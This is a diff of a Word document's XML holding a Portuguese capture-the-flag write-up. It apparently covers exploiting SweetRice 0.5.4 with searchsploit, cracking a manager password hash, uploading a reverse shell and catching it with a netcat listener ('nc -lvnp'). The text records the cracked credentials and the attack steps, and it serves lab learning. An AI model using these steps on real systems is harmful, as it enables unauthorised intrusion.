-        <w:t xml:space="preserve">Entrando no código fonte da página, é possível encontrar a versão desse </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>SweetRice</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>, sendo ele 0.5.4</w:t>
+        <w:t>Entrando no código fonte da página, é possível encontrar a versão desse SweetRice, sendo ele 0.5.4</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2642,25 +2221,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Com a versão, podemos pesquisar algum possível </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>exploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
+        <w:t xml:space="preserve">Com a versão, podemos pesquisar algum possível exploit. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2689,36 +2250,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>searchsploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>SweetRice</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> searchsploit SweetRice</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2827,69 +2360,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>url</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> da máquina alvo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, mudando o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>localhost</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, e o path até o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>SweetRice</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>a url da máquina alvo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, mudando o localhost, e o path até o SweetRice.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2918,61 +2397,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>searchsploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -x </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>webapps</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>/40</w:t>
+        <w:t xml:space="preserve"> searchsploit -x </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>php/webapps/40</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3145,25 +2578,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Procurando no arquivo, é possível achar uma </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>hash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ao lado do usuário “manager” (</w:t>
+        <w:t>Procurando no arquivo, é possível achar uma hash ao lado do usuário “manager” (</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3179,25 +2594,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">). Acessando o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>crackstation</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, conseguimos decodificar. </w:t>
+        <w:t xml:space="preserve">). Acessando o crackstation, conseguimos decodificar. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3276,25 +2673,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Agora voltando para o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>searchsploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>, pegamos a 7° opção, baixamos, e mudamos novamente a URL, para poder acessar a página de login</w:t>
+        <w:t>Agora voltando para o searchsploit, pegamos a 7° opção, baixamos, e mudamos novamente a URL, para poder acessar a página de login</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3424,43 +2803,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Somos redirecionados para a tela de login, e então só acessar. (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>User</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: manager, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>pass</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>: Password123)</w:t>
+        <w:t>Somos redirecionados para a tela de login, e então só acessar. (User: manager, pass: Password123)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3539,43 +2882,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Agora que temos acesso, podemos voltar no arquivo do </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>exploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e ver que precisamos criar uma página chamado </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>hacked.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>. Para fazer isso, acessamos a URL que ele pede, porém, vai dar erro, apenas reinicie o Firefox</w:t>
+        <w:t>Agora que temos acesso, podemos voltar no arquivo do exploit e ver que precisamos criar uma página chamado hacked.php. Para fazer isso, acessamos a URL que ele pede, porém, vai dar erro, apenas reinicie o Firefox</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3682,25 +2989,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Acesse novamente a URL do </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>exploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>Acesse novamente a URL do exploit.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3778,86 +3067,32 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Agora precisamos colocar a nossa reverse </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>shell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">dentro do </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>exploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> que baixamos, acesse ele e cole o código.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Caso você não tenha uma, pode baixar no </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>pentestmonkey</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve">Agora precisamos colocar a nossa reverse shell </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>dentro do exploit que baixamos, acesse ele e cole o código.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Caso você não tenha uma, pode baixar no pentestmonkey.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3936,61 +3171,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Agora, ao invés de acessar o arquivo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>hacked</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, ele irá acessar nossa reverse </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>shell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>Agora, ao invés de acessar o arquivo php hacked, ele irá acessar nossa reverse shell.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4068,150 +3249,32 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Podemos então agora </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>inicar</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> o nosso famoso </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>, para poder acessar a máquina.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> E colocando o URL, porém ao invés de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>hacked.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, você coloca o nome da </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>shell.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Comando usado: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>lvnp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>port</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
+        <w:t>Podemos então agora inicar o nosso famoso netcat, para poder acessar a máquina.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> E colocando o URL, porém ao invés de hacked.php, você coloca o nome da shell.php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Comando usado: nc -lvnp &lt;port&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4372,11 +3435,9 @@
           <w:color w:val="000000"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_heading=h.2et92p0" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="2"/>
-      <w:proofErr w:type="spellStart"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -4385,90 +3446,9 @@
           <w:color w:val="000000"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>What</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
